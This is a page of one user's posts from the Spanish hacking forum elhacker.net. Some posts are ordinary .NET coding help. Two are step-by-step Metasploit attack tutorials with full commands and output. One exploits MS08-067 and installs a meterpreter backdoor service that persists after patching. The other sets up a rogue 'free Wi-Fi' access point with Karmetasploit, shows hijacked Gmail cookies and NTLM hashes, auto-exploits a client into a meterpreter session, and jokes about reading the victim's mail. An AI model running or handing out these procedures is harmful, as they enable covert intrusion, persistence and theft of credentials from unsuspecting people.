elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 ... 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 [362] 363 364 365 366 367 368
3611  Programación / .NET (C#, VB.NET, ASP) / Re: navegador .net ¿alguien me ayuda con ping(dir,count)? en: 7 Enero 2010, 19:12 pm
Quieres hacer un PING a la Web que vas a entrar, para verificar si hay conexion a internet o para ver si la web esta OnLine

http://www.elguille.info/colabora/puntonET/ar_PingVBNET.htm
ó
Código
  1.    Imports System.Net
  2.  
  3.    Public Function funConexion() As Boolean
  4.        Dim Req As HttpWebRequest = WebRequest.Create("http://foro.elhacker.net")
  5.        Dim res As System.Net.HttpWebResponse
  6.  
  7.        Try
  8.            Req = DirectCast(System.Net.WebRequest.Create("http://foro.elhacker.net"), System.Net.HttpWebRequest)
  9.  
  10.  
  11.            res = DirectCast(Req.GetResponse(), System.Net.HttpWebResponse)
  12.  
  13.            Req.Abort()
  14.  
  15.            If res.StatusCode = System.Net.HttpStatusCode.OK Then
  16.                Return True
  17.            Else
  18.                Return False
  19.            End If
  20.        Catch
  21.            Return False
  22.        End Try
  23.    End Function
  24.  

Saludos!
3612  Seguridad Informática / Hacking / Re: Ayuda Nmap y Metasploit en: 7 Enero 2010, 18:39 pm
Pwned, como bien lo dijistes

PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445

Verificalo en el RPORT
3613  Seguridad Informática / Hacking / Re: Ayuda Nmap y Metasploit en: 7 Enero 2010, 18:36 pm
No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.


cpu2 Mira.
   |   

Saludos!
3614  Programación / .NET (C#, VB.NET, ASP) / Re: Modificar el contenido de una linea de un archivo de texto en c# en: 6 Enero 2010, 16:33 pm
Porque no usas Base de Datos? Tansiquiera Access, es mucho más comodo... ;)
3615  Seguridad Informática / Hacking / [Metasploit] Crear un Backdoor con meterpreter en: 6 Enero 2010, 04:03 am
[Metasploit] Crear un Backdoor con meterpreter


Primero, necesitamos una sesión de meterpreter en el sistema remoto.

Código:
                                  _             
                                 | |      o     
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  | 
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|                   
                           \|                   


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 489 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8074 updated today (2010.01.05)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.83.1
LHOST => 172.16.83.1
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 3 opened (172.16.83.1:54745 -> 172.16.83.128:4444)

meterpreter >

Una vez conseguida, ejecutamos metsrv, que instalará como servicio un servidor de meterpreter en el host remoto.

Código:
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\HdOFwlxzpobWuh...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
 * Starting service
Service metsvc successfully installed.

Ahora, si queremos, podemos reiniciar el sistema remoto, aunque el servicio ya está corriendo.

Código:
meterpreter > reboot
Rebooting...
meterpreter >

Ahora, cuando se reinicie el host remoto, vamos a conectarnos al servicio de meterpreter que acabamos de instalar.

Para ello, usaremos el handler para que nos porte el exploit windows/metsvc_bind_tcp, lo configuraremos y nos conectaremos, como haré yo.

Código:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 1 opened (172.16.83.1:42050 -> 172.16.83.128:31337)

meterpreter >

Y ya está! Esto nos viene bien por si el host remoto aplica un parche que corrija sus vulnerabilidades.
Aunque parchee el sistema, nosotros tendremos acceso a su sistema a través de ese backdoor.

Y si queremos desinstar el metsvc en el host remoto para no dejar rastro, tan sólo tenemos que ejecutar metsvc -r en nuestra sesión de meterpreter.

Código:
meterpreter > run metsvc -r
[*] Removing the existing Meterpreter service
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\QQqawIYOjLq...
[*]  >> Uploading metsvc.exe...
[*] Stopping the service...
* Stopping service metsvc
 * Removing service
Service metsvc successfully removed.

meterpreter >

Y quedará metsvc completamente desinstalado sin perder la sesión que estamos utilizando (Por si cambiamos de idea xD)

Un saludo.

Fuente: Not Spam http://foro.portalhacker.net/index.php/topic,100609.0.html
3616  Seguridad Informática / Hacking / [Metasploit] Karmetasploit en: 6 Enero 2010, 02:14 am
KARMETASPLOIT

   Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes. Resumiendo: Karmetasploit es una pasada.

CONFIGURACIÓN

   Se necesita una pequeña instalación para poner en marcha Karmetasploit, el primer paso es obterner el plugin para nuestro Metasploit Framework.

Código:
 wget http://metasploit.com/users/hdm/tools/karma.rc 

   Una vez descagado, necesitamos configurar un poco la infraestructura que necesitaremos. Cuando los cientes se conecten al AP falso que tenemos, estarán esperando que se les asigne una IP, por eso necesitamos un pequeño servidor DHCP, así que vamos a instalar dhcpd3-server y a configurarlo.

Código:
 
sudo apt-get install dhcpd3-server
sudo gedit /etc/dhcp3/dhcpd.conf
y lo dejamos así:

Código:
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}

   También necesitaremos instalar un par de cositas más.

Código:
 sudo gem install activerecord sqlite3-ruby 

   Ahora estamos preparados para empezar.

EMPEZANDO

   Primero, vamos a poner nuestra tarjeta wireless en modo monitor

Código:
root@trashhgoo:/home/trashhgoo/Hacklab# airmon-ng start wlan0


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
878 avahi-daemon
879 avahi-daemon
1012 NetworkManager
1041 wpa_supplicant


Interface Chipset Driver

eth1 Unknown wl
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

root@trashhgoo:/home/trashhgoo/Hacklab#

Como sabréis, airmon-ng nos crea un dispositivo virtual en modo monitor, en este caso mon0, y es sobre el que vamos a levantar el AP.

Código:
root@trashhgoo:/home/trashhgoo/Hacklab# airbase-ng -P -C 30 -e "WIFI_GRATUITO" -v mon0
23:39:19  Created tap interface at0
23:39:19  Trying to set MTU on at0 to 1500
23:39:19  Trying to set MTU on mon0 to 1800
23:39:19  Access Point with BSSID 00:24:01:12:3E:A6 started.

Esto nos creó una interfaz nueva, que está trabajando como AP, en mi caso: at0

¿Qué hacemos ahora? Asignarle una IP y arrancar el servidor DHCP (Asignador de IP's automáticas, para el que no lo sepa) en él, así que abrimos otro shell, dejando el airbase-ng trabajando.

Código:
root@trashhgoo:/home/trashhgoo# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.
Listening on LPF/at0/00:24:01:12:3e:a6/10.0.0/24
Sending on   LPF/at0/00:24:01:12:3e:a6/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.

No le hagáis caso al "Permission denied", es sólo que no pudo crear un archivo (Este dhcpd3 es un protestón).

Pues ya está funcionando! Qué os parece? No es maravilloso?

No?

Bueno, pues entonces vamos a seguir, que hasta ahora sólo lo estábamos preparando.

UTILIZANDO KARMETASPLOIT

Si utilizáis metasploit 3.2, tenéis que guardar karma.rb en la carpeta donde está msfconsole, si usáis la 3.3, tenéis que estar en la carpeta donde lo tenéis guardado o asignar la carpeta donde lo tenemos guardado.

Código:
root@trashhgoo:/home/trashhgoo# cd Hacklab
root@trashhgoo:/home/trashhgoo/Hacklab# ls karma.rc
karma.rc

Lo tenéis? Pues vamos a poner en marcha el chiringuito con un sencillo comando.

Código:
 msfconsole -r karma.rc 

También podría haber puesto msfconsole -r /home/trashhgoo/Hacklab/karma.rc
Y hala! A bailar! Ahora el propio msfconole es el que hará todo!
Empezará a levantar servers, que no son más que trampas para los incautos que se conecten a nuestro AP. Cuando parezca que se para, pulsemos ENTER.

Código:
[*] Started reverse handler on port 3333
[*] Starting the payload handler...
[*] Started reverse handler on port 6666

[*] --- Done, found 14 exploit modules

[*] Using URL: http://0.0.0.0:55550/ads
[*]  Local IP: http://77.209.92.221:55550/ads
[*] Server started.

msf auxiliary(http) >

No os hacéis a una idea de la cantidad de exploits que tenemos cargados, a la espera de que algún incauto pique.

Y qué pasa si pican? Pues lo veremos ahora...

PICARON!!!!

Código:
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MC1=V=3&GUID=e2eabc69be554e3587acce84901a53d3;
MUID=E7E065776DBC40099851B16A38DB8275; mh=MSFT; CULTURE=EN-US; zip=z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId=14; FlightId=BasePage;
hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F; hpcli=W.H|L.|S.|R.|U.L|C.|H.; ushpwea=wc:USNE0363; wpv=2
[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] Request '/ads' from 10.0.0.100:1278
[*] Recording detection from User-Agent
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] Browser claims to be MSIE 5.01, running on Windows 2000
[*] DNS 10.0.0.100:1293 XID 97 (IN::A google.com)
[*] Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in
`check'/usr/lib/ruby/1.8/sqlite3/ resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby
1.8/sqlite3
[*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-
gcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY
zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8

Vale, vale, vale... Un momento! Vamos a ver! Qué es todo esto?

Bien, todo esto son los datos que nos está enviando nuestra pesca, y algo interesante es por ejemplo ese par de cookies que nos acaban de regalar.

Código:
[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY
zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-
gcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8

SON PARA GMAIL!! Pues ya podemos acceder a su correo (Risa malévola, sonido de órgano y llamas infernales saliendo del suelo iluminando una sonrisa malvada).

Y aparte de esas pueden aparecernos muchas más, pero... Qué más puede pasar? Pues puede pasar que la pesca sea vulnerable a algún ataque, por lo que obtendríamos lo siguiente:

Código:

[*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Connecting to the ADMIN$ share...
[*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Regenerating the payload...
[*] Uploading payload...
[*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Created UxsjordQ.exe...
[*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Connecting to the Service Control Manager...
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Removing the service...
[*] Closing service handle...
[*] Deleting UxsjordQ.exe...
[*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
[*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Sending Access Denied to 10.0.0.100:1362
[*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Ignoring request from 10.0.0.100, attack already in progress.
[*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
[*] Sending stage (2650 bytes)
[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 5.01 cookies=
[*] Sleeping before handling stage...
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Migrating to lsass.exe...
[*] Current server process: rundll32.exe (848)
[*] New server process: lsass.exe (232)
[*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)

msf auxiliary(http) > sessions -l

Active sessions
===============

  Id  Description  Tunnel                            
  --  -----------  ------                            
  1   Meterpreter  10.0.0.1:45017 -> 10.0.0.100:1364


Oh! Una sesión de meterpreter! Y sin hacer nada! No es estupendo? No, es Karmetasploit.


Fuente: Not Spam http://foro.portalhacker.net/index.php/topic,100592.0.html


3617  Programación / .NET (C#, VB.NET, ASP) / Re: [C#] borrar TextBox's en un bucle en: 5 Enero 2010, 21:25 pm
Por su pollo? ajjajaja ta buena xD
Simon!

http://www.youtube.com/watch?v=Q_SjqRAO3f8
3618  Programación / Programación Visual Basic / Re: Inline ASM shell using Metasploit Payload [SRC] en: 5 Enero 2010, 21:12 pm
WTF!
3619  Programación / .NET (C#, VB.NET, ASP) / Re: [C#] borrar TextBox's en un bucle en: 5 Enero 2010, 20:42 pm
Amigo Sheel Root, "" es mala practica
Por su pollo, eso mismo me pregunté, uso las "" pero en Aspx.Net. Además el code no es mio... Mira la fuente...

Saludos!
3620  Programación / .NET (C#, VB.NET, ASP) / Re: [C#] borrar TextBox's en un bucle en: 5 Enero 2010, 18:28 pm
Vaciar Contenido de los Textbox (Windows Forms)- VB y CSharp

Aqui les dejo la forma de limpiar los Textbox de los Windows Forms, por que en muchas ocasiones hemos cometido el groso error de decirle a cada textbox que su valor es “”… lo bueno de este truquillo es que si tiene texto o numero o lo que sea este lo deja vacio.. Espero que les guste.

VB:
Código
  1. 'Declaramos nuestro metodo que hara la limpieza de los textbox
  2. Private Sub LimpiarTextBox(ByVal ofrm As Form)
  3.     'hace un chequeo por todos los textbox del formulario
  4.     For Each oControl As Control In ofrm.Controls
  5.         If TypeOf oCobtrol Is TextBox Then
  6.             oControl.Text = ""
  7.         End If
  8.     Next
  9. End Sub
  10.  
  11. Private Sub BtnPruebaLimpiarTextBox_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles BtnPruebaLimpiarTextBox.Click
  12.     Call LimpiarTextBox(Me)
  13. End Sub
  14.  

C#:
Código
  1. // Declaramos nuestro metodo que hara la limpieza de los textbox
  2. private void LimpiarTextBox(Form ofrm){
  3.     // hace un chequeo por todos los textbox del formulario
  4.     foreach (Control oControls in ofrm.Controls){
  5.         if (oControls is TextBox){
  6.             oControls.Text = ""; // eliminar el texto
  7.         }
  8.     }
  9. }
  10.  
  11. private void BtnPruebaLimpiarTextBox_Click(System.Object sender, System.EventArgs e){
  12.     // pasar el formulario
  13.     LimpiarTextBox(this);
  14. }

Fuente: http://alexjimenez.wordpress.com/2008/01/25/truco-vaciar-contenido-de-los-textbox-windows-forms-vb-y-csharp/

Saludos!
Páginas: 1 ... 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 [362] 363 364 365 366 367 368
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines